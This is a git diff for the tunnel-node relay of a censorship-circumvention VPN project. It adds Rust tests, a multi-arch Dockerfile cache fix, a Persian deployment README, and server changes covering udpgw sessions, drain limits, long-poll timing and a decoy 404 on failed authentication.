#[test] - fn no_longpoll_cache_is_sticky() { - let (mux, _rx) = mux_for_test(); - assert!(!mux.server_no_longpoll()); - mux.mark_server_no_longpoll(); - assert!(mux.server_no_longpoll()); - mux.mark_server_no_longpoll(); // idempotent - assert!(mux.server_no_longpoll()); + fn legacy_state_is_per_deployment() { + let (mux, _rx) = mux_for_test_with(2); + mux.mark_server_no_longpoll("script-A"); + + let deps = mux.legacy_deployments.lock().unwrap(); + assert!(deps.contains_key("script-A")); + assert!( + !deps.contains_key("script-B"), + "marking A must not insert an entry for B" + ); + } + + /// `all_servers_legacy` (the per-session 30 s read-timeout gate) flips + /// to true *only* when every known deployment has been marked. With + /// 2 deployments, marking one keeps the gate false; marking both + /// flips it true. + #[test] + fn all_servers_legacy_requires_every_deployment() { + let (mux, _rx) = mux_for_test_with(2); + assert!(!mux.all_servers_legacy()); + + mux.mark_server_no_longpoll("script-A"); + assert!( + !mux.all_servers_legacy(), + "1 of 2 marked: aggregate must stay false" + ); + + mux.mark_server_no_longpoll("script-B"); + assert!( + mux.all_servers_legacy(), + "all deployments marked: aggregate flips true" + ); + + // Idempotent re-mark of an already-legacy deployment doesn't + // disturb the aggregate. + mux.mark_server_no_longpoll("script-A"); + assert!(mux.all_servers_legacy()); + } + + /// After `LEGACY_RECOVER_AFTER`, an entry is treated as expired and + /// the deployment rejoins the long-poll fast path. The next mark + /// (against any deployment) sweeps stale entries before recomputing + /// the aggregate gate, so a recovered peer doesn't keep counting + /// toward `all_legacy`. Backdating the mark time avoids a real 60 s + /// sleep in the test — same effect as the wall-clock moving forward. 
+ #[test] + fn legacy_state_recovers_after_ttl() { + let (mux, _rx) = mux_for_test_with(2); + mux.mark_server_no_longpoll("script-A"); + + // Backdate A past LEGACY_RECOVER_AFTER, then mark B. B's mark + // must trigger a sweep that drops the stale A entry. + { + let mut deps = mux.legacy_deployments.lock().unwrap(); + let stale = Instant::now() + .checked_sub(LEGACY_RECOVER_AFTER + Duration::from_secs(1)) + .expect("test environment should have a non-trivial monotonic clock"); + deps.insert("script-A".to_string(), stale); + } + mux.mark_server_no_longpoll("script-B"); + + let deps = mux.legacy_deployments.lock().unwrap(); + assert!( + !deps.contains_key("script-A"), + "expired entry must be swept on the next mark — otherwise stale legacy state never clears" + ); + assert!(deps.contains_key("script-B")); + } + + /// If every deployment is legacy and then time passes past + /// `LEGACY_RECOVER_AFTER` *without any new mark*, the aggregate gate + /// must self-correct on the next `all_servers_legacy()` call. + /// Without the in-place sweep on read, stale legacy marks would keep + /// the 30 s read-timeout active forever after every deployment + /// recovers. + #[test] + fn all_servers_legacy_self_corrects_when_entries_expire() { + let (mux, _rx) = mux_for_test_with(2); + mux.mark_server_no_longpoll("script-A"); + mux.mark_server_no_longpoll("script-B"); + assert!(mux.all_servers_legacy()); + + // Backdate every entry past TTL. 
+ { + let mut deps = mux.legacy_deployments.lock().unwrap(); + let stale = Instant::now() + .checked_sub(LEGACY_RECOVER_AFTER + Duration::from_secs(1)) + .expect("monotonic clock should be far enough along"); + for (_, t) in deps.iter_mut() { + *t = stale; + } + } + + assert!( + !mux.all_servers_legacy(), + "aggregate must self-correct when all entries expire — otherwise the 30 s read timeout sticks forever" + ); } #[test] diff --git a/tunnel-node/Dockerfile b/tunnel-node/Dockerfile index a31f31e8..801a0ac9 100644 --- a/tunnel-node/Dockerfile +++ b/tunnel-node/Dockerfile @@ -35,9 +35,21 @@ COPY src/ ./src/ # BuildKit cache mounts: cargo's registry/git caches and the target/ # directory persist across builds, dramatically speeding up rebuilds when # only application code changes. -RUN --mount=type=cache,target=/usr/local/cargo/registry \ - --mount=type=cache,target=/usr/local/cargo/git \ - --mount=type=cache,target=/app/target \ +# +# `id=...-$TARGETPLATFORM` is load-bearing on multi-arch builds. Without +# it, BuildKit defaults to a single shared cache across architectures +# and the `linux/amd64` + `linux/arm64` jobs race on the same on-disk +# `/usr/local/cargo/registry/src/...//.cargo-ok` extraction. The +# second-arriving arch hits `File exists (os error 17)` mid-unpack and +# the whole multi-arch build fails. Per-platform cache id keeps each +# arch's cache isolated; warm-build speedup is preserved per-arch. +# `target` cache is also platform-scoped because target/ holds object +# files for one ABI and sharing them across arches would just produce +# misses or, worse, invalid linking. 
+ARG TARGETPLATFORM +RUN --mount=type=cache,target=/usr/local/cargo/registry,id=cargo-registry-${TARGETPLATFORM} \ + --mount=type=cache,target=/usr/local/cargo/git,id=cargo-git-${TARGETPLATFORM} \ + --mount=type=cache,target=/app/target,id=app-target-${TARGETPLATFORM} \ cargo build --release --bin tunnel-node && \ cp /app/target/release/tunnel-node /usr/local/bin/tunnel-node diff --git a/tunnel-node/README.fa.md b/tunnel-node/README.fa.md new file mode 100644 index 00000000..007f7174 --- /dev/null +++ b/tunnel-node/README.fa.md @@ -0,0 +1,188 @@ +# Tunnel Node — راهنمای فارسی + +> *English: [README.md](./README.md)* + +سرور پل HTTP-tunnel برای حالت `full` در MasterHttpRelayVPN. درخواست‌های HTTP-tunnel رو که از Apps Script می‌رسن، به اتصال‌های واقعی TCP/UDP تبدیل می‌کنه. + +این `tunnel-node` همون قطعه‌ای از مسیر Full mode هست که روی **VPS شما** اجرا می‌شه. جواب کوتاه به سؤال «آیا VPS لازمه؟» = **بله، برای حالت Full بدون VPS کار نمی‌کنه**. + +## معماری + +``` +موبایل/PC → mhrv-rs → [TLS با domain-fronting روی Google] → Apps Script → [HTTP] → Tunnel Node (روی VPS شما) → [TCP/UDP واقعی] → اینترنت +``` + +Tunnel-node session‌های پایدار TCP و UDP رو نگه می‌داره. session‌های TCP اتصال‌های واقعی به سرور مقصد هستن؛ session‌های UDP، socketهای connected-UDP به یک `host:port` مقصد هستن. 
data از طریق پروتکل JSON جریان داره: + +- **connect** — باز کردن TCP به `host:port` + برگرداندن session ID +- **data** — نوشتن data کلاینت + خوندن جواب سرور +- **udp_open** — باز کردن UDP به `host:port`، اختیاری اولین datagram رو همزمان می‌فرسته +- **udp_data** — یک datagram UDP می‌فرسته، یا اگه `d` ست نشه برای datagram‌های برگشتی poll می‌کنه +- **close** — تخریب session +- **batch** — پردازش چند op در یک request HTTP (تعداد روند-تریپ کمتر) + +## استقرار + +### Cloud Run (پیشنهاد برای کاربران ایرانی متأثر از فیلتر #313) + +اجرای tunnel-node روی **Google Cloud Run** یعنی destination IP خود Google هست — احتمال filter شدن مسیر Apps Script → tunnel-node توسط ISP ایران بسیار پایین‌تر از Hetzner/DigitalOcean. ([کانتکست در #313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)) + +```bash +cd tunnel-node +gcloud run deploy tunnel-node \ + --source . \ + --region us-central1 \ + --allow-unauthenticated \ + --set-env-vars TUNNEL_AUTH_KEY=$(openssl rand -hex 24) \ + --memory 256Mi \ + --cpu 1 \ + --max-instances 1 +``` + +### Docker — image آماده (هر VPS) + +سریع‌ترین مسیر. image آماده pull کن و اجرا کن؛ نیاز به Rust toolchain روی VPS نیست. + +```bash +# secret قوی بساز. ذخیره‌اش کن — همین مقدار رو بعداً تو CodeFull.gs paste می‌کنی. +SECRET=$(openssl rand -hex 24) +echo "TUNNEL_AUTH_KEY شما: $SECRET" + +# Pull + run. +docker run -d \ + --name mhrv-tunnel \ + --restart unless-stopped \ + -p 8080:8080 \ + -e TUNNEL_AUTH_KEY="$SECRET" \ + ghcr.io/therealaleph/mhrv-tunnel-node:latest +``` + +تگ `:latest` آخرین release رو دنبال می‌کنه. برای production توصیه می‌شه روی version مشخص pin بزنی: `ghcr.io/therealaleph/mhrv-tunnel-node:v1.8.0` (یا هر نسخه‌ای که داری). image روی `linux/amd64` و `linux/arm64` موجوده. 
+ +**docker-compose.yml** اگه این رو ترجیح می‌دی: + +```yaml +services: + tunnel: + image: ghcr.io/therealaleph/mhrv-tunnel-node:latest + restart: unless-stopped + ports: + - "8080:8080" + environment: + TUNNEL_AUTH_KEY: ${TUNNEL_AUTH_KEY} +``` + +سپس `TUNNEL_AUTH_KEY=your-secret docker compose up -d`. + +### Docker — build از source + +اگه می‌خوای خودت image رو build کنی (یا custom تغییر بدی): + +```bash +cd tunnel-node +docker build -t tunnel-node . +docker run -p 8080:8080 -e TUNNEL_AUTH_KEY=your-secret tunnel-node +``` + +### Binary مستقیم + +```bash +cd tunnel-node +cargo build --release +TUNNEL_AUTH_KEY=your-secret PORT=8080 ./target/release/tunnel-node +``` + +## متغیرهای محیطی + +| متغیر | الزامی | پیش‌فرض | توضیح | +|-------|--------|---------|-------| +| `TUNNEL_AUTH_KEY` | بله | `changeme` | secret مشترک — باید با `TUNNEL_AUTH_KEY` در CodeFull.gs match کنه | +| `PORT` | خیر | `8080` | پورت listen (Cloud Run خودش این رو ست می‌کنه) | +| `MHRV_DIAGNOSTIC` | خیر | (off) | اگه `1` باشه، روی auth بد به‌جای decoy 404 nginx، JSON `{"e":"unauthorized"}` صریح برمی‌گردونه. **فقط برای setup/debug** — قبل از public کردن tunnel-node خاموشش کن. (v1.8.0+) | + +## پروتکل + +### تک op: `POST /tunnel` + +```json +{"k":"auth","op":"connect","host":"example.com","port":443} +{"k":"auth","op":"data","sid":"uuid","data":"base64"} +{"k":"auth","op":"close","sid":"uuid"} +``` + +### Batch: `POST /tunnel/batch` + +```json +{ + "k": "auth", + "ops": [ + {"op":"data","sid":"uuid1","d":"base64"}, + {"op":"udp_data","sid":"uuid2","d":"base64"}, + {"op":"close","sid":"uuid3"} + ] +} +→ {"r": [{...}, {...}, {...}]} +``` + +### Health check: `GET /health` → `ok` + +## Performance: تعداد deployment و عمق pipeline + +کلاینت mhrv-rs در حالت Full یک batch-multiplexer pipelined اجرا می‌کنه. هر روند-تریپ Apps Script حدود ۲ ثانیه طول می‌کشه، پس کلاینت چندین request batch همزمان شلیک می‌کنه — عمق pipeline برابر تعداد deployment ID‌های Apps Script هست (حداقل ۲، بدون سقف بالا). 
+ +تعداد deployment بیشتر = batchهای همزمان بیشتر روی tunnel-node = latency پایین‌تر برای session. با ۶ deployment، هر ۰.۳ ثانیه یه batch جدید می‌رسه (به‌جای هر ۲ ثانیه). + +خود tunnel-node per-request stateless هست (session‌ها بر اساس UUID key می‌شن)، پس batchهای همزمان رو طبیعی handle می‌کنه. برای بهترین نتیجه، ۳–۱۲ Apps Script روی account‌های Google جداگانه deploy کن و همهٔ deployment ID‌ها رو در config کلاینت لیست کن. + +--- + +## سؤالات رایج + +### حجم مصرف چقدره؟ + +سه لایه overhead هست در حالت Full: + +1. **Base64 encoding** برای data ها در JSON envelope = ~۳۳٪ overhead روی payload (4 byte per 3 byte raw) +2. **JSON envelope + headers** = ~۵-۱۵٪ overhead بسته به اندازه payload +3. **Random padding (v1.8.0+)** برای DPI defense = متوسط ۵۱۲ بایت اضافه به هر batch + +تخمین کلی: اگه ۱ GB دانلود می‌کنی، ~۱.۲۵-۱.۳ GB روی پهنای باند VPS مصرف می‌کنه. + +برای ۲۰ GB ماهانه استفاده روزمره (browsing + Telegram + ویدیو متوسط)، ~۲۵-۲۷ GB پهنای باند VPS لازم داری. Hetzner CX11 (€۴/ماه) ۲۰ TB ماهانه می‌ده — یعنی به سقف نمی‌رسی مگه streaming سنگین. + +### روی موبایل کل برنامه‌ها رو بالا میاره؟ + +**بستگی به Mode داره:** + +- **mhrv-rs Android در Tunnel mode (Operating Mode → Tunnel)** + Full + tunnel-node = ✅ کل ترافیک Android (شامل YouTube، Telegram MTProto، Instagram، Snapchat، هر چیزی) capture می‌شه. این از VpnService استفاده می‌کنه. +- **mhrv-rs Android در Proxy mode** + Full + tunnel-node = فقط app‌هایی که proxy رو صریحاً respect می‌کنن (Chrome، Firefox، برخی app‌های Telegram-فارسی). YouTube/Insta/Telegram اصلی proxy رو نادیده می‌گیرن + از mhrv-rs رد نمی‌شن. + +برای اینکه «همهٔ app‌ها بیان» = حتماً **Tunnel mode** فعال کن. + +### سرعت چقدر خوبه؟ + +برای یک flow (یک download، یک ویدیو، یک TCP connection) معمولاً **۵۰–۲۰۰ KB/s** هست. 
علت: + +- Apps Script روند-تریپ floor ~۲۰۰-۵۰۰ ms داره (غیر قابل پایین آوردن، Google-side limit) +- هر batch به یک deployment باند می‌شه + هر flow به یک batch +- در نتیجه per-flow throughput = batch_size / batch_round_trip = (~۶۴-۲۵۶ KB) / (~۲۵۰-۵۰۰ ms) ≈ ۱۲۸-۵۰۰ KB/s ceiling + +برای **چند flow همزمان** (browsing با چند تب، Telegram + YouTube همزمان)، throughput جمعی به sum از همه flow‌ها مقیاس می‌خوره — با ۶ deployment روی ۶ Google account می‌تونی ۶ flow همزمان داشته باشی. + +**توصیه واقع‌بینانه:** برای browsing عادی + chat + ویدیو متوسط = کافیه. برای دانلود فایل‌های بزرگ سریع، **Wireguard مستقیم روی همان VPS** ابزار درست‌تره (۵-۱۰x سریع‌تر، چون Apps Script رو دور می‌زنه). mhrv-rs ارزش اصلیش لایه «دور زدن censorship با domain-fronting» هست، نه سرعت raw — وقتی به اون لایه نیاز نداری (مسیر مستقیم به VPS باز هست)، ابزار ساده‌تر بهتره. + +### آیا VPS لازمه؟ + +برای **حالت Full** (شامل Telegram، YouTube بدون 60s SABR cliff، WebSockets، MTProto و هر چیزی غیر-HTTPS-ساده): **بله، VPS الزامی هست**. + +برای **حالت `apps_script`** (browsing فقط HTTPS): **خیر، نیاز به VPS نیست** — فقط نیاز به Apps Script setup روی Google account داری. + +برای **حالت `direct`** (Google services مثل Search/Gmail/YouTube، به علاوهٔ هر `fronting_groups` که تنظیم کرده باشید): **نه VPS لازمه نه Apps Script** — فقط تونل بازنویسی `SNI`. (نام قبلی این حالت `google_only` بود.) + +### چه VPS‌ای پیشنهاد می‌شه؟ + +- **Hetzner CX11** (Falkenstein/Helsinki، €۴/ماه) — best value، ۲۰ TB ماهانه، خوب برای کاربران اروپا/خاورمیانه +- **DigitalOcean basic droplet** ($۶/ماه، NYC/SFO) — برای کاربران آمریکا +- **Google Cloud Run** (free tier تا ۲ میلیون request/ماه + ۵ GB egress) — تنها provider که destination IP اصلاً Google هست، پس مسیر Iran→Apps Script→Cloud-Run-tunnel-node کاملاً درون شبکه Google می‌مونه و ISP filter نمی‌بینه. **بهترین گزینه برای کاربران ایرانی متأثر از [#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)**. 
+ +برای راهنمای قدم‌به‌قدم setup: [#310 reply (راهنمای فارسی)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310#issuecomment-4326086988). diff --git a/tunnel-node/README.md b/tunnel-node/README.md index 88d884ba..529c15e3 100644 --- a/tunnel-node/README.md +++ b/tunnel-node/README.md @@ -1,5 +1,7 @@ # Tunnel Node +> *Persian / فارسی: [README.fa.md](./README.fa.md)* + HTTP tunnel bridge server for MasterHttpRelayVPN "full" mode. Bridges HTTP tunnel requests (from Apps Script) to real TCP connections. ## Architecture diff --git a/tunnel-node/src/main.rs b/tunnel-node/src/main.rs index e03ff5e8..69e361cb 100644 --- a/tunnel-node/src/main.rs +++ b/tunnel-node/src/main.rs @@ -22,12 +22,14 @@ use axum::{routing::post, Json, Router}; use base64::engine::general_purpose::STANDARD as B64; use base64::Engine; use serde::{Deserialize, Serialize}; -use tokio::io::{AsyncReadExt, AsyncWriteExt}; -use tokio::net::tcp::{OwnedReadHalf, OwnedWriteHalf}; +use tokio::io::{AsyncRead, AsyncReadExt, AsyncWriteExt}; +use tokio::net::tcp::OwnedWriteHalf; use tokio::net::{lookup_host, TcpStream, UdpSocket}; use tokio::sync::{mpsc, Mutex, Notify}; use tokio::task::JoinSet; +mod udpgw; + /// Structured error code returned when the tunnel-node receives an op it /// doesn't recognize. Clients use this (rather than string-matching `e`) to /// detect a version mismatch and gracefully fall back. @@ -40,16 +42,13 @@ const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP"; /// milliseconds — once any session in the batch fires its notify. const ACTIVE_DRAIN_DEADLINE: Duration = Duration::from_millis(350); -/// After the first session in an active batch wakes the wait, we sleep -/// briefly so neighboring sessions whose responses land just after the -/// first one don't get reported empty and pay an extra round-trip. Only -/// applies to active batches — for long-poll batches the wake event IS -/// the data we want, so we deliver it immediately. 
-/// -/// 30 ms is much shorter than the legacy two-pass retry (150 + 200 ms) -/// but covers the typical case of co-located upstreams whose RTTs -/// cluster within a few tens of ms of each other. -const STRAGGLER_SETTLE: Duration = Duration::from_millis(30); +/// Adaptive straggler settle: after the first session in an active batch +/// wakes the drain, keep checking in STEP increments whether new data is +/// still arriving. Stops when no new data arrived in the last STEP (the +/// burst is over) or MAX is reached. Packing more session responses into +/// one batch saves quota on high-latency relays (~1.5s Apps Script overhead). +const STRAGGLER_SETTLE_STEP: Duration = Duration::from_millis(40); +const STRAGGLER_SETTLE_MAX: Duration = Duration::from_millis(500); /// Drain-phase deadline when the batch is a pure poll (no writes, no new /// connections — clients just asking "any push data?"). Holding the @@ -63,18 +62,16 @@ const STRAGGLER_SETTLE: Duration = Duration::from_millis(30); /// op per session), so any local bytes that arrive while the poll is /// being held are stuck in the kernel until the poll returns. /// -/// * Lower (e.g. 2 s) — interactive shells / typing-burst flows feel -/// snappier, but push-only sessions pay more empty round-trips. -/// * Higher (e.g. 20 s) — push delivery is near-RTT and round-trip -/// count is minimal, but a thinking pause between keystrokes can -/// tax the next keystroke by up to the chosen value. -/// -/// 5 s is a middle ground: a typing user pausing mid-thought pays at -/// most a 5 s nudge before their next keystroke flows, while idle -/// sessions still get the bulk of the long-poll benefit. Must also -/// stay safely below the client's `BATCH_TIMEOUT` (30 s) and Apps -/// Script's UrlFetch ceiling (~60 s). -const LONGPOLL_DEADLINE: Duration = Duration::from_secs(5); +/// 15 s keeps persistent connections (Telegram XMPP on :5222, Google +/// Push on :5228) alive without forcing frequent reconnects. 
At 5 s, +/// apps like Telegram interpreted the frequent empty returns as +/// connection instability and rotated sessions — each reconnect costs +/// a full TLS handshake (~4 s through Apps Script), causing visible +/// video/voice interruptions. 15 s is well below the client's +/// `BATCH_TIMEOUT` (30 s) and Apps Script's UrlFetch ceiling (~60 s). +/// Tested on censored networks in Iran where users reported smoother +/// Telegram video playback and fewer session resets at this value. +const LONGPOLL_DEADLINE: Duration = Duration::from_secs(15); /// Bound on each UDP session's inbound queue. Beyond this we drop oldest /// to keep recent voice/media packets moving — a stale RTP frame is @@ -86,6 +83,22 @@ const UDP_QUEUE_LIMIT: usize = 256; /// a maximum-size IPv4 datagram without truncation. const UDP_RECV_BUF_BYTES: usize = 65536; +/// Maximum raw bytes per TCP drain that we hand back to Apps Script in +/// one batch response. Apps Script's hard cap on Web App response body +/// is ~50 MiB. Accounting for base64 encoding (1.33×) and JSON envelope +/// overhead, the safe ceiling for raw bytes is roughly 32 MiB — but +/// `serde_json::to_vec` for a single 32-MiB string is also a CPU spike, +/// so we lean further back at 16 MiB. On a high-bandwidth VPS (1 Gbps+) +/// the reader task can stuff the per-session buffer with tens of MiB +/// between polls (issue #460); without this cap, `drain_now` would take +/// the lot, the response would exceed Apps Script's ceiling, the body +/// would be truncated mid-base64, and the client would fail JSON parse +/// with `EOF while parsing a string at line 1 column ~52428685`. By +/// returning at most this many bytes per drain and leaving the rest in +/// the read buffer for the next poll, we keep responses comfortably +/// under the cap and let throughput recover across batches. 
+const TCP_DRAIN_MAX_BYTES: usize = 16 * 1024 * 1024; + /// First queue-drop on a session always logs at warn level; subsequent /// drops log at debug only every Nth occurrence so a single congested /// session can't flood the operator's log. @@ -95,8 +108,30 @@ const UDP_QUEUE_DROP_LOG_STRIDE: u64 = 100; // Session // --------------------------------------------------------------------------- +/// Writer half — either a real TCP socket or an in-process duplex channel +/// (used for virtual sessions like udpgw). +enum SessionWriter { + Tcp(OwnedWriteHalf), + Duplex(tokio::io::WriteHalf), +} + +impl SessionWriter { + async fn write_all(&mut self, buf: &[u8]) -> std::io::Result<()> { + match self { + SessionWriter::Tcp(w) => w.write_all(buf).await, + SessionWriter::Duplex(w) => w.write_all(buf).await, + } + } + async fn flush(&mut self) -> std::io::Result<()> { + match self { + SessionWriter::Tcp(w) => w.flush().await, + SessionWriter::Duplex(w) => w.flush().await, + } + } +} + struct SessionInner { - writer: Mutex, + writer: Mutex, read_buf: Mutex>, eof: AtomicBool, last_active: Mutex, @@ -110,6 +145,17 @@ struct SessionInner { struct ManagedSession { inner: Arc, reader_handle: tokio::task::JoinHandle<()>, + /// For udpgw sessions, the server task handle (so we can abort on close). + udpgw_handle: Option>, +} + +impl ManagedSession { + fn abort_all(&self) { + self.reader_handle.abort(); + if let Some(ref h) = self.udpgw_handle { + h.abort(); + } + } } /// UDP equivalent of `SessionInner`. Holds a *connected* `UdpSocket` @@ -148,7 +194,7 @@ async fn create_session(host: &str, port: u16) -> std::io::Result std::io::Result) { +/// Create a virtual udpgw session backed by an in-process duplex channel. 
+fn create_udpgw_session() -> ManagedSession { + let (client_half, server_half) = tokio::io::duplex(65536); + let (read_half, write_half) = tokio::io::split(client_half); + + let inner = Arc::new(SessionInner { + writer: Mutex::new(SessionWriter::Duplex(write_half)), + read_buf: Mutex::new(Vec::with_capacity(32768)), + eof: AtomicBool::new(false), + last_active: Mutex::new(Instant::now()), + notify: Notify::new(), + }); + + let inner_ref = inner.clone(); + let reader_handle = tokio::spawn(reader_task(read_half, inner_ref)); + let udpgw_handle = Some(tokio::spawn(udpgw::udpgw_server_task(server_half))); + + ManagedSession { inner, reader_handle, udpgw_handle } +} + +async fn reader_task(mut reader: impl AsyncRead + Unpin, session: Arc) { let mut buf = vec![0u8; 65536]; loop { match reader.read(&mut buf).await { @@ -274,13 +340,33 @@ async fn udp_reader_task(socket: Arc, session: Arc) } } -/// Drain whatever is currently buffered — no waiting. -/// Used by batch mode where we poll frequently. +/// Drain up to `TCP_DRAIN_MAX_BYTES` from the per-session read buffer — +/// no waiting. Used by batch mode where we poll frequently. +/// +/// If the buffer is larger than the cap, we return a prefix of the +/// data and leave the remainder in the buffer for the next poll. The +/// cap exists to keep batch responses under Apps Script's ~50 MiB body +/// ceiling on high-bandwidth VPS — see `TCP_DRAIN_MAX_BYTES` for the +/// underlying issue (#460). +/// +/// `eof` is reported as true only when the buffer has been fully +/// drained AND upstream has signaled EOF — otherwise a partial drain +/// would prematurely tear the session down on the client side. 
async fn drain_now(session: &SessionInner) -> (Vec, bool) { let mut buf = session.read_buf.lock().await; - let data = std::mem::take(&mut *buf); - let eof = session.eof.load(Ordering::Acquire); - (data, eof) + let raw_eof = session.eof.load(Ordering::Acquire); + if buf.len() <= TCP_DRAIN_MAX_BYTES { + let data = std::mem::take(&mut *buf); + (data, raw_eof) + } else { + // Take the prefix; leave the tail in the buffer. + let tail = buf.split_off(TCP_DRAIN_MAX_BYTES); + let head = std::mem::replace(&mut *buf, tail); + // Don't propagate eof yet — buffer still has data even if upstream + // has closed. The client will get eof on the drain that returns + // an empty (or sub-cap) buffer. + (head, false) + } } /// Block until *any* of `inners` has buffered data, hits EOF, or the @@ -480,6 +566,16 @@ struct AppState { sessions: Arc>>, udp_sessions: Arc>>, auth_key: String, + /// Active probing defense: when false (default, production), bad + /// AUTH_KEY responses are a generic-looking 404 with no JSON-shaped + /// "unauthorized" body — same as a static nginx 404. Active scanners + /// that POST malformed payloads to `/tunnel` to discover proxy + /// endpoints categorize this as a non-tunnel host and move on. + /// Enable via `MHRV_DIAGNOSTIC=1` for setup/debugging — restores the + /// previous JSON `{"e":"unauthorized"}` body so it's clear *which* + /// of "wrong key", "wrong URL path", or "wrong tunnel-node" you've + /// hit. (Inspired by #365 Section 3.) 
+ diagnostic_mode: bool, } // --------------------------------------------------------------------------- @@ -553,19 +649,41 @@ struct BatchResponse { async fn handle_tunnel( State(state): State, Json(req): Json, -) -> Json { +) -> axum::response::Response { if req.k != state.auth_key { - return Json(TunnelResponse::error("unauthorized")); + return decoy_or_unauthorized(state.diagnostic_mode); } - match req.op.as_str() { - "connect" => Json(handle_connect(&state, req.host, req.port).await), + let resp: TunnelResponse = match req.op.as_str() { + "connect" => handle_connect(&state, req.host, req.port).await, "connect_data" => { - Json(handle_connect_data_single(&state, req.host, req.port, req.data).await) + handle_connect_data_single(&state, req.host, req.port, req.data).await } - "data" => Json(handle_data_single(&state, req.sid, req.data).await), - "close" => Json(handle_close(&state, req.sid).await), - other => Json(TunnelResponse::unsupported_op(other)), - } + "data" => handle_data_single(&state, req.sid, req.data).await, + "close" => handle_close(&state, req.sid).await, + other => TunnelResponse::unsupported_op(other), + }; + Json(resp).into_response() +} + +/// Active-probing defense for the bad-auth path. Production default is +/// a 404 with a generic "Not Found" HTML body that mimics a vanilla +/// nginx/apache static error page — active scanners categorize this +/// as a regular web server with nothing interesting and move on. +/// `MHRV_DIAGNOSTIC=1` restores the previous JSON `{"e":"unauthorized"}` +/// body so misconfigured clients get a clear error during setup. +fn decoy_or_unauthorized(diagnostic_mode: bool) -> axum::response::Response { + if diagnostic_mode { + return Json(TunnelResponse::error("unauthorized")).into_response(); + } + let body = "\r\n404 Not Found\r\n\ + \r\n

404 Not Found

\r\n\ +
nginx
\r\n\r\n\r\n"; + ( + StatusCode::NOT_FOUND, + [(header::CONTENT_TYPE, "text/html")], + body, + ) + .into_response() } // --------------------------------------------------------------------------- @@ -602,10 +720,20 @@ async fn handle_batch( }; if req.k != state.auth_key { - let resp = serde_json::to_vec(&BatchResponse { - r: vec![TunnelResponse::error("unauthorized")], - }).unwrap_or_default(); - return (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], resp); + if state.diagnostic_mode { + let resp = serde_json::to_vec(&BatchResponse { + r: vec![TunnelResponse::error("unauthorized")], + }).unwrap_or_default(); + return (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], resp); + } + // Production: same nginx-404 decoy as the single-op path. See + // `decoy_or_unauthorized` for rationale. + let body = "\r\n404 Not Found\r\n\ + \r\n

404 Not Found

\r\n\ +
nginx
\r\n\r\n\r\n" + .as_bytes() + .to_vec(); + return (StatusCode::NOT_FOUND, [(header::CONTENT_TYPE, "text/html")], body); } // Process all ops in two phases. @@ -817,7 +945,6 @@ async fn handle_batch( .collect() }; - let wait_start = Instant::now(); // Wait for either side to wake. Running both concurrently means // a TCP-only batch isn't slowed by a stale UDP watch list, and // vice versa. @@ -827,9 +954,45 @@ async fn handle_batch( ); if had_writes_or_connects { - let remaining = deadline.saturating_sub(wait_start.elapsed()); - if !remaining.is_zero() { - tokio::time::sleep(STRAGGLER_SETTLE.min(remaining)).await; + // Adaptive settle: keep waiting in steps while new data + // keeps arriving. Break when: + // 1. No new data arrived in the last step (burst is over) + // 2. 500ms max reached + let settle_end = Instant::now() + STRAGGLER_SETTLE_MAX; + let mut prev_tcp_bytes: usize = 0; + let mut prev_udp_pkts: usize = 0; + // Snapshot current buffer sizes. + for inner in &tcp_inners { + prev_tcp_bytes += inner.read_buf.lock().await.len(); + } + for inner in &udp_inners { + prev_udp_pkts += inner.packets.lock().await.len(); + } + loop { + let now = Instant::now(); + if now >= settle_end { + break; + } + let remaining = settle_end.duration_since(now); + tokio::time::sleep(STRAGGLER_SETTLE_STEP.min(remaining)).await; + + // Measure current buffer sizes. + let mut tcp_bytes: usize = 0; + let mut udp_pkts: usize = 0; + for inner in &tcp_inners { + tcp_bytes += inner.read_buf.lock().await.len(); + } + for inner in &udp_inners { + udp_pkts += inner.packets.lock().await.len(); + } + + // No new data since last step — burst is over. 
+ if tcp_bytes == prev_tcp_bytes && udp_pkts == prev_udp_pkts { + break; + } + + prev_tcp_bytes = tcp_bytes; + prev_udp_pkts = udp_pkts; } } @@ -971,9 +1134,13 @@ async fn handle_connect(state: &AppState, host: Option, port: Option v, Err(r) => return r, }; - let session = match create_session(&host, port).await { - Ok(s) => s, - Err(e) => return TunnelResponse::error(format!("connect failed: {}", e)), + let session = if udpgw::is_udpgw_dest(&host, port) { + create_udpgw_session() + } else { + match create_session(&host, port).await { + Ok(s) => s, + Err(e) => return TunnelResponse::error(format!("connect failed: {}", e)), + } }; let sid = uuid::Uuid::new_v4().to_string(); tracing::info!("session {} -> {}:{}", sid, host, port); @@ -995,9 +1162,13 @@ async fn handle_connect_data_phase1( ) -> Result<(String, Arc), TunnelResponse> { let (host, port) = validate_host_port(host, port)?; - let session = create_session(&host, port) - .await - .map_err(|e| TunnelResponse::error(format!("connect failed: {}", e)))?; + let session = if udpgw::is_udpgw_dest(&host, port) { + create_udpgw_session() + } else { + create_session(&host, port) + .await + .map_err(|e| TunnelResponse::error(format!("connect failed: {}", e)))? + }; // Any failure below this point must abort the reader task, otherwise // the newly-opened upstream TCP connection would leak. Keep the @@ -1146,7 +1317,7 @@ async fn handle_close(state: &AppState, sid: Option) -> TunnelResponse { _ => return TunnelResponse::error("missing sid"), }; if let Some(s) = state.sessions.lock().await.remove(&sid) { - s.reader_handle.abort(); + s.abort_all(); tracing::info!("session {} closed by client", sid); } if let Some(s) = state.udp_sessions.lock().await.remove(&sid) { @@ -1234,7 +1405,24 @@ async fn main() { .init(); let auth_key = std::env::var("TUNNEL_AUTH_KEY").unwrap_or_else(|_| { - tracing::warn!("TUNNEL_AUTH_KEY not set — using default (INSECURE)"); + // Catch the recurring `MHRV_AUTH_KEY` typo (#391, #444). 
